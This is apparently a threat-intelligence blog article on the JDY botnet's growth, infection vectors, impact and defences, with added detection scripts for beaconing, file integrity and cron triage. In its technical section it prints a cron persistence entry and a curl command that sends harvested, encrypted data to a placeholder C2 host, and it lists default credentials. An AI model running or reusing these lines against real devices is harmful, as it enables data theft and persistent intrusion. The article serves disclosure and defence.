China-Linked JDY Botnet Expands to 1,500+ Devices for Cyber Reconnaissance

A sophisticated China-linked botnet known as JDY has expanded its infrastructure to over 1,500 compromised devices worldwide, primarily targeting network edge devices for cyber reconnaissance operations. The botnet leverages compromised routers, IoT devices, and network appliances to create a distributed attack infrastructure capable of surveillance, credential harvesting, and facilitating further intrusions. Security researchers have observed the threat actor employing advanced evasion techniques and maintaining persistent access across multiple sectors, raising significant concerns about ongoing espionage activities.

Introduction

The cybersecurity community is tracking a significant expansion of the JDY botnet, a malicious network infrastructure attributed to Chinese threat actors. Recent telemetry indicates the botnet has grown to encompass more than 1,500 compromised devices across multiple countries, with a particular focus on network perimeter equipment. Unlike traditional botnets designed for distributed denial-of-service (DDoS) attacks or cryptomining, JDY appears purpose-built for intelligence gathering and reconnaissance operations, demonstrating characteristics consistent with state-sponsored cyber espionage campaigns.

The botnet’s growth pattern and targeting preferences suggest a strategic approach to building resilient command-and-control infrastructure while maintaining operational security. This development underscores the evolving threat landscape where nation-state actors increasingly weaponize consumer and enterprise networking equipment to support long-term intelligence operations.

Background & Context

The JDY botnet first appeared on security researchers’ radar approximately 18 months ago, initially comprising several hundred compromised devices. Attribution to Chinese threat actors stems from multiple indicators including infrastructure overlaps with known Chinese APT groups, operational timing consistent with China Standard Time working hours, and targeting patterns aligned with Chinese strategic interests.

Botnets have traditionally served as tools for cybercriminal enterprises, but nation-state actors have increasingly adopted this technique to create proxy networks that obscure attribution and provide geographic diversity for operations. The JDY botnet follows this pattern, utilizing compromised legitimate devices as stepping stones for reconnaissance and initial access operations.

The targeted devices primarily include end-of-life routers, poorly secured IoT equipment, and network-attached storage (NAS) devices—all of which typically receive minimal security monitoring despite their critical position at network boundaries. This strategic choice allows attackers to intercept traffic, harvest credentials, and establish persistent footholds while remaining below typical detection thresholds.

Technical Breakdown

The JDY botnet employs a multi-stage infection process that begins with scanning for vulnerable devices exposed to the internet. The threat actors exploit both known vulnerabilities and default credentials, with particular focus on devices no longer receiving manufacturer security updates.

Initial Compromise

The infection vector typically involves one of three methods:

  • CVE-2021-35394 (Realtek SDK vulnerability)
  • CVE-2022-30075 (TOTOLINK router vulnerability)
  • Default credentials (admin/admin, root/root)

Once initial access is achieved, the malware deploys a lightweight agent designed to evade detection through several techniques, described in the sections that follow.

Persistence Mechanisms

The botnet maintains persistence through cron job modifications and firmware-level implants:

# Example persistence mechanism (cron entry running every 15 minutes, output discarded)
*/15 * * * * /tmp/.system/update.sh >/dev/null 2>&1

Command and Control

JDY utilizes a decentralized C2 architecture with multiple fallback domains and IP addresses. Communications are encrypted using custom protocols that blend with legitimate HTTPS traffic, making network-based detection challenging.

The botnet implements a tiered architecture where compromised devices serve different roles:

  • Proxy nodes: Route attack traffic and obscure origin
  • Scanner nodes: Identify new targets for expansion
  • Reconnaissance nodes: Monitor network traffic and harvest credentials

Data Exfiltration

Captured data is exfiltrated through encrypted channels, with compression and staging occurring on the compromised device to minimize network signatures:

# Simplified exfiltration pattern
tar czf - /tmp/.harvest/* | openssl enc -aes-256-cbc | curl -X POST https://[C2]/u -d @-

Impact & Risk Assessment

The expansion of JDY to over 1,500 devices represents a significant escalation in capability and reach for the operators. Organizations with compromised devices in their infrastructure face multiple risk categories:

Intelligence Gathering

The primary risk involves unauthorized surveillance of network traffic, potentially exposing sensitive communications, credentials, and proprietary information. Positioned at network boundaries, these devices can intercept both inbound and outbound communications.

Lateral Movement Facilitator

Compromised edge devices provide ideal launching points for deeper network intrusions. Attackers can leverage these footholds to bypass perimeter defenses and access internal systems that would otherwise be unreachable.

Attribution Laundering

Organizations whose devices are compromised may unknowingly become accomplices in attacks against third parties, complicating incident response and potentially exposing them to legal and reputational risks.

Operational Resilience

The distributed nature of the botnet makes takedown efforts challenging. Even if portions of the infrastructure are disrupted, the decentralized architecture allows continued operations through surviving nodes.

Risk Severity: High for organizations in sectors of strategic interest to Chinese intelligence, including defense, technology, telecommunications, and critical infrastructure.

Vendor Response

Multiple vendors whose products have been compromised as part of the JDY botnet infrastructure have issued statements and guidance. However, many affected devices are end-of-life products no longer receiving security updates, creating a significant remediation challenge.

Several networking equipment manufacturers have released firmware updates addressing the vulnerabilities exploited by JDY operators:

  • Realtek: Issued patches for SDK vulnerabilities but cannot update devices where manufacturers have discontinued support
  • TOTOLINK: Released firmware updates for affected router models
  • Netgear, TP-Link, and others: Published security advisories recommending device replacement for EOL models

Cloud service providers have begun implementing enhanced detection for traffic patterns associated with JDY infrastructure, though the botnet’s evolution continues to challenge signature-based approaches.

Law enforcement agencies in multiple countries are coordinating efforts to disrupt JDY infrastructure, but the attribution complexities and international jurisdictional issues slow response efforts.

Mitigations & Workarounds

Organizations can implement several measures to reduce exposure to JDY and similar botnet threats:

Immediate Actions

Inventory network edge devices: Identify all routers, IoT devices, and network appliances exposed to the internet:

# Example network discovery scan
nmap -sV -p 80,443,8080,23,22 --script=banner [your-network-range]

Change default credentials: Implement strong, unique passwords for all network devices:

# Generate strong passwords
openssl rand -base64 32

Disable unnecessary services: Reduce attack surface by disabling unused protocols and management interfaces:

# Disable Telnet, enable SSH only from trusted networks
# Configure on device management interface

Strategic Remediation

  • Replace EOL devices: Develop hardware refresh cycle prioritizing internet-facing equipment
  • Segment networks: Isolate IoT and edge devices on dedicated VLANs with restricted access
  • Implement zero-trust architecture: Require authentication and authorization for all device communications
  • Enable automatic updates: Where supported, configure automatic firmware updates for security patches

Detection & Monitoring

Identifying JDY infections requires multi-layered detection approaches:

Network Indicators

Monitor for unusual outbound connections from edge devices:

# Example packet capture for beaconing analysis (tcpdump is not NetFlow; use flow
# exports from the router or switch when you need to cover a whole segment)
# Capture outbound TCP SYN packets (new connection attempts) from the edge device,
# then look for small, regularly spaced connections to the same destination
tcpdump -i eth0 -n 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn' -c 100 -w suspicious.pcap
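As an added example (not from the original article or its author), the following Python script applies the beaconing heuristic that a capture like the one above is meant to feed: it groups flow records by source, destination and port, measures how regular the connection intervals are, and flags pairs whose timer is near-constant and whose payloads are small. The flow records, the IP addresses (taken from the documentation ranges 192.0.2.0/24, 198.51.100.0/24 and 203.0.113.0/24) and the thresholds are constructed assumptions, not JDY indicators.

```python
"""Beacon detection over flow records (constructed sample data).

Added example, not from the original article: groups outbound flows by
(source, destination, port), measures the regularity of connection start
times, and flags pairs whose intervals are nearly constant and whose
payloads are small, the "small, regular beaconing" pattern described above.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records: (start_time_seconds, src_ip, dst_ip, dst_port, bytes_out).
# 192.0.2.10 is an edge device connecting every ~900 s to an assumed C2 address
# 198.51.100.7; 192.0.2.20 is a workstation with irregular browsing traffic.
SAMPLE_FLOWS = [
    (0,    "192.0.2.10", "198.51.100.7", 443, 312),
    (901,  "192.0.2.10", "198.51.100.7", 443, 298),
    (1799, "192.0.2.10", "198.51.100.7", 443, 305),
    (2702, "192.0.2.10", "198.51.100.7", 443, 310),
    (3600, "192.0.2.10", "198.51.100.7", 443, 301),
    (4499, "192.0.2.10", "198.51.100.7", 443, 307),
    (5,    "192.0.2.20", "203.0.113.5", 443, 48210),
    (37,   "192.0.2.20", "203.0.113.5", 443, 9130),
    (640,  "192.0.2.20", "203.0.113.5", 443, 120044),
    (655,  "192.0.2.20", "203.0.113.5", 443, 3300),
    (2950, "192.0.2.20", "203.0.113.5", 443, 76120),
    (2960, "192.0.2.20", "203.0.113.5", 443, 5010),
]


def find_beacons(flows, min_flows=5, max_jitter=0.10, max_bytes=2048):
    """Return [(src, dst, port, mean_interval, jitter)] for pairs that look like beacons.

    jitter = pstdev(intervals) / mean(intervals); a low value means the device
    connects on a near-fixed timer, which interactive user traffic rarely does.
    The thresholds are assumed starting points and should be tuned per environment.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, port, nbytes in flows:
        by_pair[(src, dst, port)].append((ts, nbytes))

    beacons = []
    for (src, dst, port), entries in by_pair.items():
        if len(entries) < min_flows:
            continue  # too few connections to judge regularity
        entries.sort()
        times = [t for t, _ in entries]
        intervals = [b - a for a, b in zip(times, times[1:])]
        avg = mean(intervals)
        if avg <= 0:
            continue
        jitter = pstdev(intervals) / avg
        avg_bytes = mean(b for _, b in entries)
        if jitter <= max_jitter and avg_bytes <= max_bytes:
            beacons.append((src, dst, port, round(avg, 1), round(jitter, 3)))
    return beacons


if __name__ == "__main__":
    for src, dst, port, avg, jitter in find_beacons(SAMPLE_FLOWS):
        print(f"possible beacon: {src} -> {dst}:{port} every ~{avg}s (jitter {jitter})")
```

In practice the input comes from NetFlow/IPFIX exports or Zeek conn logs rather than a hand-built list; the grouping key and the two thresholds are the parts worth adapting, and a hit should be correlated with the destination's reputation and with the device's expected update or NTP schedule before it is treated as an incident.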

Behavioral Analytics

Establish baselines for normal device behavior and alert on deviations:

  • Unexpected CPU or memory utilization spikes
  • New processes or services not part of standard firmware
  • Outbound connections to unusual geographic locations
  • DNS queries to newly registered or suspicious domains

Filesystem Integrity

Implement monitoring for unauthorized filesystem modifications:

# Create checksums of legitimate firmware files right after a clean install, and keep
# a copy of baseline.txt off the device (e.g. read-only on a management host)
find /bin /sbin /usr/bin -type f -exec sha256sum {} \; > baseline.txt

# Periodically compare against the baseline; note that -c only reports files already
# listed, so newly added files (such as a dropped hidden directory) need a separate check
sha256sum -c baseline.txt
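A `sha256sum -c` check reports only files already present in the baseline, so an implant dropped into a new hidden directory never shows up. The following Python script, an added example that is not from the original article, builds a hash baseline over a set of roots and then reports added files alongside modified and removed ones. The directory layout, file names and the appended "trojanized" bytes are constructed inside a temporary directory; the hidden path only mirrors the /tmp/.system/ naming mentioned in the article and is not a real sample.

```python
"""Filesystem baseline comparison that also catches added files.

Added example, not from the original article. Walks the monitored roots,
hashes every regular file, and diffs two snapshots into added, removed and
modified paths. All paths and contents below are constructed in a temp dir.
"""
import hashlib
import os
import tempfile


def build_baseline(roots):
    """Map absolute path -> sha256 hex digest for every regular file under roots."""
    baseline = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):  # os.walk does not skip dot-dirs
            for name in files:
                path = os.path.join(dirpath, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue  # skip symlinks and special files
                with open(path, "rb") as fh:
                    baseline[path] = hashlib.sha256(fh.read()).hexdigest()
    return baseline


def compare_baseline(baseline, current):
    """Diff two snapshots; 'added' is what sha256sum -c alone would never report."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: clean baseline, then a tampered binary and a hidden drop dir."""
    with tempfile.TemporaryDirectory() as tmp:
        bindir = os.path.join(tmp, "bin")
        tmpdir = os.path.join(tmp, "tmp")
        os.makedirs(bindir)
        os.makedirs(tmpdir)
        for name in ("busybox", "dropbear"):  # stand-ins for firmware binaries
            with open(os.path.join(bindir, name), "wb") as fh:
                fh.write(b"constructed firmware binary: " + name.encode())
        baseline = build_baseline([bindir, tmpdir])

        # Simulated tampering: modify one binary and drop a script in a hidden directory
        with open(os.path.join(bindir, "dropbear"), "ab") as fh:
            fh.write(b"\x90 constructed tamper marker")
        hidden = os.path.join(tmpdir, ".system")
        os.makedirs(hidden)
        with open(os.path.join(hidden, "update.sh"), "w") as fh:
            fh.write("#!/bin/sh\n# constructed placeholder, not real malware\n")

        report = compare_baseline(baseline, build_baseline([bindir, tmpdir]))
        # Strip the temp prefix so the result is stable and readable
        return {k: [os.path.relpath(p, tmp) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

On a real device the baseline should be taken immediately after a trusted firmware install and compared from a management host that pulls the files (or their hashes) over SSH, so that a compromised device cannot rewrite its own baseline.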

Compromise Indicators

Specific indicators associated with JDY operations include:

  • Connections to known C2 domains (consult threat intelligence feeds)
  • Presence of hidden directories like /tmp/.system/ or similar naming patterns
  • Cron jobs referencing unfamiliar scripts or binaries
  • Unusual port scanning activity originating from edge devices
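To turn the cron and hidden-directory indicators above into a repeatable check, here is an added Python example (not from the original article) that parses crontab text and flags entries that reference a hidden path component, run from a temp or staging directory, or silence all their output. The crontab content is constructed; the flagged entry only reproduces the shape of the persistence pattern described earlier, and the heuristics are assumptions to be tuned against the device's known-good configuration.

```python
"""Crontab triage for edge-device IoC hunting (added example, not from the article).

Parses crontab text (standard five-field and @keyword schedules) and flags
commands that reference hidden path components, temp/staging directories, or
redirect all output to /dev/null. Sample content below is constructed.
"""
import re

HIDDEN_COMPONENT = re.compile(r"(?:^|/)\.[^/\s]+")        # e.g. /tmp/.system
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")         # world-writable locations
SILENCED = re.compile(r">\s*/dev/null\s+2>&1")             # discard stdout and stderr

# Constructed crontab: two benign entries and one matching the persistence pattern above
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
@daily /usr/bin/ntpdate pool.ntp.org
*/15 * * * * /tmp/.system/update.sh >/dev/null 2>&1
"""


def parse_crontab(text):
    """Yield (schedule, command) pairs, skipping comments, blank and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        if line.startswith("@"):                      # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:                                         # five schedule fields then command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed entry, nothing to run
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield sched, cmd.strip()


def triage_crontab(text):
    """Return [(schedule, command, [reasons])] for entries worth an analyst's attention."""
    findings = []
    for sched, cmd in parse_crontab(text):
        reasons = []
        if HIDDEN_COMPONENT.search(cmd):
            reasons.append("hidden path component")
        if any(d in cmd for d in STAGING_DIRS):
            reasons.append("runs from temp/staging directory")
        if SILENCED.search(cmd):
            reasons.append("output silenced")
        if reasons:
            findings.append((sched, cmd, reasons))
    return findings


if __name__ == "__main__":
    for sched, cmd, reasons in triage_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(reasons)}] {sched} {cmd}")
```

Feed it the output of `crontab -l` for each account plus the contents of /etc/crontab and /etc/cron.d/* collected from the device; a hit is a lead for the filesystem and network checks above, not proof of compromise on its own, since some vendor firmware legitimately schedules jobs from unusual paths.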

Best Practices

Defending against sophisticated botnet operations requires comprehensive security hygiene:

Device Lifecycle Management

Implement formal processes for tracking device support lifecycles and replacing equipment before it reaches end-of-life status. Budget appropriately for hardware refresh cycles, recognizing that security costs extend beyond initial purchase price.

Network Architecture

Design networks with compromise assumptions built into the architecture. Edge devices should be treated as untrusted by default, with rigorous access controls governing their ability to communicate with internal resources.

Threat Intelligence Integration

Subscribe to threat intelligence feeds covering IoT and botnet activities. Integrate indicators of compromise into security monitoring systems to enable early detection of known malicious infrastructure.

Vendor Security Assessment

When selecting network equipment vendors, evaluate their security track record including:

  • Frequency and quality of security updates
  • Support lifecycle duration
  • Security vulnerability disclosure practices
  • Built-in security features like secure boot and firmware signing

Incident Response Preparation

Develop specific playbooks for responding to compromised edge devices, including isolation procedures, forensic collection approaches, and decision trees for device replacement versus remediation.

Key Takeaways

  • The JDY botnet has expanded to over 1,500 compromised devices worldwide, primarily targeting network edge equipment for reconnaissance operations
  • Attribution indicators point to Chinese threat actors employing the infrastructure for intelligence gathering aligned with strategic interests
  • Compromised devices include routers, IoT equipment, and NAS devices, many of which are end-of-life products no longer receiving security updates
  • The botnet employs sophisticated evasion techniques, encrypted C2 communications, and a decentralized architecture that complicates disruption efforts
  • Organizations face risks including unauthorized surveillance, facilitation of lateral movement, and unwitting participation in attacks against third parties
  • Effective defense requires comprehensive device inventory, replacement of EOL equipment, network segmentation, and behavioral monitoring
  • The incident underscores the critical importance of security considerations in network edge device procurement and lifecycle management

Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.